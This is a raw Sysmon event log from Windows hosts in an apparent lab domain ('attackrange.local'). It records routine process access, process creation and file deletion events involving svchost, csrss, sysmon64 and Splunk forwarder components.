10341000x800000000000000083185Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:33.025{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083184Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:33.025{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083183Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:33.025{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083182Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:33.025{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083181Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:33.025{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083180Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:33.025{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083179Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:33.025{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083178Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:33.025{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083177Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:33.025{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B4A1-615A-8A01-00000000FD01}1668C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083176Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:33.025{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B4A1-615A-8A01-00000000FD01}1668C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083175Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:33.026{2FDD8D40-B4A1-615A-8A01-00000000FD01}1668C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000083205Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.713{2FDD8D40-B4A2-615A-8B01-00000000FD01}32003324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083204Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.681{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8855DADF8896B934E17CC503C9A122B,SHA256=D3779D6C2C3CC23F16A3A87545CFD4DEBAF93619AC32C084D18F79BFE86DDFB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000106809Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:34.561{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CB93DB6DE5317233888B2CE703C2BC0,SHA256=F1FD4E7B3EE83E95891B97F9B86FE6CAC00F221DEB9E500AA863E021B94A03C6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083203Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.494{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B4A2-615A-8B01-00000000FD01}3200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083202Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.494{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083201Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.494{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083200Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.494{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083199Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.494{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083198Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.494{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083197Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.494{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083196Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.494{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083195Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.494{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083194Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.494{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083193Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.494{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B4A2-615A-8B01-00000000FD01}3200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083192Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.494{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B4A2-615A-8B01-00000000FD01}3200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083191Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:34.495{2FDD8D40-B4A2-615A-8B01-00000000FD01}3200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000083190Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:30.611{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 